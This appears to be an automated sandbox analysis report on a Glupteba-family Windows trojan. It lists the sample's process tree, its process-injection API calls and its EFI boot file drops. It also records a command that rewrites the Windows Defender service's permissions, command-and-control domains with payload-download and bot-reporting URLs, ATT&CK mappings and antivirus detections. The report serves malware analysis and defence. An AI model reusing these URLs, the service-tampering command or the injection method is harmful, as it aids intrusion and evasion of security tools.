        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2d446151824b69a919c7d5646f0806b8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe, csrss.exeBinary or memory string: AhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, new state: Off
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D9D3C GetProcessHeap,
        Source: C:\Users\user\Desktop\upd.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019BD8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019C543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019BE37C SetUnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019BDE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Contains functionality to inject threads in other processesShow sources
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,
        Performs DNS TXT record lookupsShow sources
        Source: TrafficDNS traffic detected: queries for: trumops.com
        Source: TrafficDNS traffic detected: queries for: trumops.com
        Source: TrafficDNS traffic detected: queries for: logs.trumops.com
        Source: TrafficDNS traffic detected: queries for: 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
        Source: TrafficDNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeProcess created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
        Source: C:\Users\user\Desktop\upd.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmpBinary or memory string: Program Manager
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: try_get_function,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D5140 cpuid
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019BE0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

        Remote Access Functionality:

        barindex
        Yara detected Metasploit PayloadShow sources
        Source: Yara matchFile source: 11.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation21Windows Service1Windows Service1Obfuscated Files or Information11Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Process Injection112Software Packing11Input Capture1File and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Masquerading231Security Account ManagerSystem Information Discovery34SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsService Execution1Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion2NTDSSecurity Software Discovery241Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol25SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsProcess Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 515565 Sample: 0NlSa5bf55 Startdate: 04/11/2021 Architecture: WINDOWS Score: 100 96 Multi AV Scanner detection for domain / URL 2->96 98 Antivirus detection for URL or domain 2->98 100 Antivirus detection for dropped file 2->100 102 11 other signatures 2->102 11 0NlSa5bf55.exe 2 2->11         started        15 svchost.exe 1 2->15         started        17 svchost.exe 1 2->17         started        19 4 other processes 2->19 process3 dnsIp4 74 runmodes.com 172.67.207.136, 443, 49749, 49750 CLOUDFLARENETUS United States 11->74 76 trumops.com 11->76 80 2 other IPs or domains 11->80 64 C:\Users\user\Desktop\upd.exe, PE32 11->64 dropped 21 upd.exe 16 11->21         started        24 conhost.exe 11->24         started        78 192.168.2.1 unknown unknown 15->78 file5 process6 signatures7 110 Antivirus detection for dropped file 21->110 112 Multi AV Scanner detection for dropped file 21->112 114 Machine Learning detection for dropped file 21->114 116 Drops PE files with benign system names 21->116 26 upd.exe 2 21->26         started        process8 file9 62 C:\Windows\rss\csrss.exe, PE32 26->62 dropped 118 Drops executables to the windows directory (C:\Windows) and starts them 26->118 30 csrss.exe 13 8 26->30         started        signatures10 process11 dnsIp12 82 trumops.com 30->82 84 runmodes.com 30->84 86 5 other IPs or domains 30->86 66 C:\Windows\windefender.exe, PE32 30->66 dropped 68 C:\Users\user\AppData\Local\...\injector.exe, PE32+ 30->68 dropped 70 C:\Users\...70tQuerySystemInformationHook.dll, PE32+ 30->70 dropped 72 5 other files (none is malicious) 30->72 dropped 88 Antivirus detection for dropped file 30->88 90 Multi AV Scanner detection for dropped file 30->90 92 Machine Learning detection for dropped file 30->92 94 2 other signatures 30->94 35 injector.exe 1 30->35         started        38 windefender.exe 1 30->38         started        40 schtasks.exe 1 30->40         started        42 6 other processes 30->42 file13 signatures14 process15 signatures16 104 Antivirus detection for dropped file 35->104 106 Multi AV Scanner detection for dropped file 35->106 108 Contains functionality to inject threads in other processes 35->108 44 conhost.exe 35->44         started        46 cmd.exe 38->46         started        48 conhost.exe 38->48         started        50 conhost.exe 40->50         started        52 conhost.exe 42->52         started        54 conhost.exe 42->54         started        56 conhost.exe 42->56         started        58 3 other processes 42->58 process17 process18 60 sc.exe 46->60         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        0NlSa5bf55.exe67%VirustotalBrowse
        0NlSa5bf55.exe64%ReversingLabsWin32.Trojan.WinGoRanumBot

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe100%AviraTR/Agent.twerk
        C:\Users\user\Desktop\upd.exe100%AviraTR/AD.GoCloudnet.vvvot
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll100%AviraTR/Redcap.gsjan
        C:\Windows\windefender.exe100%AviraTR/Crypt.XPACK.eocey
        C:\Windows\rss\csrss.exe100%AviraTR/AD.GoCloudnet.vvvot
        C:\Users\user\Desktop\upd.exe100%Joe Sandbox ML
        C:\Windows\rss\csrss.exe100%Joe Sandbox ML
        B:\EFI\Boot\old.efi (copy)0%ReversingLabs
        B:\EFI\Microsoft\Boot\fw.efi (copy)0%ReversingLabs
        C:\EFI\Boot\EfiGuardDxe.efi0%ReversingLabs
        C:\EFI\Boot\bootx64.efi0%ReversingLabs
        C:\EFI\Microsoft\Boot\bootmgfw.efi0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll46%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll59%ReversingLabsWin64.Trojan.Glupject
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe14%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe73%ReversingLabsWin64.Trojan.Glupteba
        C:\Users\user\Desktop\upd.exe31%MetadefenderBrowse
        C:\Users\user\Desktop\upd.exe86%ReversingLabsWin32.Trojan.WinGoRanumBot
        C:\Windows\rss\csrss.exe31%MetadefenderBrowse
        C:\Windows\rss\csrss.exe86%ReversingLabsWin32.Trojan.WinGoRanumBot
        C:\Windows\windefender.exe29%MetadefenderBrowse
        C:\Windows\windefender.exe79%ReversingLabsWin32.Trojan.WinGoRanumBot

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        11.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        5.0.upd.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        0.0.0NlSa5bf55.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        11.2.csrss.exe.11c38000.10.unpack100%AviraTR/Patched.Ren.GenDownload File
        11.0.csrss.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        11.0.csrss.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        11.2.csrss.exe.11bb8000.9.unpack100%AviraTR/Patched.Ren.GenDownload File
        5.0.upd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        5.0.upd.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        43.0.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        0.3.0NlSa5bf55.exe.115f2000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
        0.3.0NlSa5bf55.exe.115f4000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
        11.0.csrss.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        0.2.0NlSa5bf55.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        43.2.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        5.2.upd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        37.0.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        5.0.upd.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        8.0.upd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        11.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        0.3.0NlSa5bf55.exe.115f6000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
        8.2.upd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        37.2.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        runmodes.com7%VirustotalBrowse
        server16.trumops.com7%VirustotalBrowse
        gohnot.com11%VirustotalBrowse
        server2.trumops.com7%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://retoti.comidentifier0%Avira URL Cloudsafe
        https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta0%Avira URL Cloudsafe
        https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-10020%Avira URL Cloudsafe
        https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:0%URL Reputationsafe
        https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125560%Avira URL Cloudsafe
        http://gais.cs.ccu.edu.tw/robot.php)Gulper0%Avira URL Cloudsafe
        https://server2.trumops.comhttps://server2.trumops.comserver2.trumops.com:443ultserver2.trumops.com:0%Avira URL Cloudsafe
        https://server2.trumops.com/api/pollserver2.trumops.com0%Avira URL Cloudsafe
        https://trumops.comhttps://retoti.commusnotifyicon.exeRuntimeBroker.exersionruntimebroker.exeSgrmBro0%Avira URL Cloudsafe
        https://logs.trumops.com0%Avira URL Cloudsafe
        http://www.spidersoft.com)Wget/1.90%Avira URL Cloudsafe
        https://retoti.com0%Avira URL Cloudsafe
        https://trumops.comif-unmodified-sinceillegal0%Avira URL Cloudsafe
        http://help.ya0%Avira URL Cloudsafe
        https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.com0%Avira URL Cloudsafe
        https://server16.trumops.comc=dfd675dbadcd07bb&kind=main&server16.trumops.com:443server16.trumops.co0%Avira URL Cloudsafe
        http://devlog.gregarius.net/docs/ua)Links0%URL Reputationsafe
        https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A100%Avira URL Cloudmalware
        https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS0%Avira URL Cloudsafe
        https://server2.trumops.com0%Avira URL Cloudsafe
        https://runmodes.com/api/log100%Avira URL Cloudmalware
        http://grub.org)Mozilla/5.00%Avira URL Cloudsafe
        http://www.everyfeed.c0%Avira URL Cloudsafe
        https://trumops.com0%Avira URL Cloudsafe
        http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exe0%Avira URL Cloudsafe
        https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com100%Avira URL Cloudmalware
        http://www.exabot.com/go/robot)Opera/9.800%URL Reputationsafe
        http://www.googlebot.com/bot.html)Links0%URL Reputationsafe
        http://schemas.microsoft0%URL Reputationsafe
        https://server2.trumops.comc=fa2e76e6e1aa03da&uuid=server2.trumops.com:443server2.trumops.com:443tcp0%Avira URL Cloudsafe
        https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
        https://humisnee.com/sbmstart.phpindefinite0%Avira URL Cloudsafe
        http://gohnot.com/d28daa3fb329cff58b19acdf478b78820%Avira URL Cloudsafe
        https://server2.trumops.com/api/poll0%Avira URL Cloudsafe
        https://logs.trumops.comhttps://runmodes.com/api/loghttps://server2.trumops.com0%Avira URL Cloudsafe
        https://trumops.com/api/install-failureinvalid0%Avira URL Cloudsafe
        http://crl.ver)0%Avira URL Cloudsafe
        https://server2.trumops.com/api/pollE0%Avira URL Cloudsafe
        https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
        https://server16.trumops.com0%Avira URL Cloudsafe
        http://gohnot.com/d28daa3fb329cff58b19acdf478b7882:s0%Avira URL Cloudsafe
        http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
        https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
        http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exe0%Avira URL Cloudsafe
        http://www.bloglines.com)F0%Avira URL Cloudsafe
        http://misc.yahoo.com.cn/he0%Avira URL Cloudsafe
        http://newscommer.com/app/app.exe100%URL Reputationmalware
        http://crl.g0%URL Reputationsafe
        https://blockchain.infoindex0%URL Reputationsafe
        https://disneyplus.com/legal.0%URL Reputationsafe
        https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid=0%Avira URL Cloudsafe
        https://www.tiktok.com/legal/report/0%Avira URL Cloudsafe
        https://sitescore.aiValue0%Avira URL Cloudsafe
        http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
        https://runmodes.com/api/loginvalid100%Avira URL Cloudmalware
        https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.coma0%Avira URL Cloudsafe
        http://help.disneyplus.com.0%URL Reputationsafe
        https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e0%Avira URL Cloudsafe
        https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        runmodes.com
        		172.67.207.136
        		truetrueunknown
        server16.trumops.com
        		172.67.139.144
        		truefalseunknown
        gohnot.com
        		104.21.92.165
        		truefalseunknown
        server2.trumops.com
        		104.21.79.9
        		truefalseunknown
        trumops.com
        		unknown
        		unknowntrue
          		unknown
          442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
          		unknown
          		unknowntrue
            		unknown
            logs.trumops.com
            		unknown
            		unknowntrue
              		unknown
              e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://runmodes.com/api/logtrue
                • Avira URL Cloud: malware
                		unknown
                http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://server2.trumops.com/api/pollfalse
                • Avira URL Cloud: safe
                		unknown
                http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid=false
                • Avira URL Cloud: safe
                		unknown
                https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6efalse
                • Avira URL Cloud: safe
                		unknown
                https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6efalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://retoti.comidentifierupd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://search.msn.com/msnbupd.exe, csrss.exefalse
                  		high
                  https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInstaupd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002upd.exe, 00000005.00000002.323617755.00000000118CE000.00000004.00000001.sdmp, upd.exe, 00000005.00000002.323544402.00000000118BE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:upd.exe, csrss.exefalse
                  • URL Reputation: safe
                  		unknown
                  https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556upd.exe, 00000008.00000002.351356403.000000001180A000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://gais.cs.ccu.edu.tw/robot.php)Gulperupd.exe, csrss.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://server2.trumops.comhttps://server2.trumops.comserver2.trumops.com:443ultserver2.trumops.com:csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://server2.trumops.com/api/pollserver2.trumops.comcsrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://trumops.comhttps://retoti.commusnotifyicon.exeRuntimeBroker.exersionruntimebroker.exeSgrmBrocsrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://logs.trumops.comcsrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.google.com/bot.html)tls:upd.exe, csrss.exefalse
                    		high
                    http://www.spidersoft.com)Wget/1.9upd.exe, csrss.exefalse
                    • Avira URL Cloud: safe
                    		low
                    https://retoti.comupd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp, upd.exe, 00000008.00000002.351385142.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://trumops.comif-unmodified-sinceillegal0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://help.yaupd.exe, csrss.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.comcsrss.exe, 0000000B.00000003.410492385.00000000119AC000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://server16.trumops.comc=dfd675dbadcd07bb&kind=main&server16.trumops.com:443server16.trumops.co0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://devlog.gregarius.net/docs/ua)Linksupd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3Acsrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOSupd.exe, 00000005.00000002.323457865.00000000118AE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
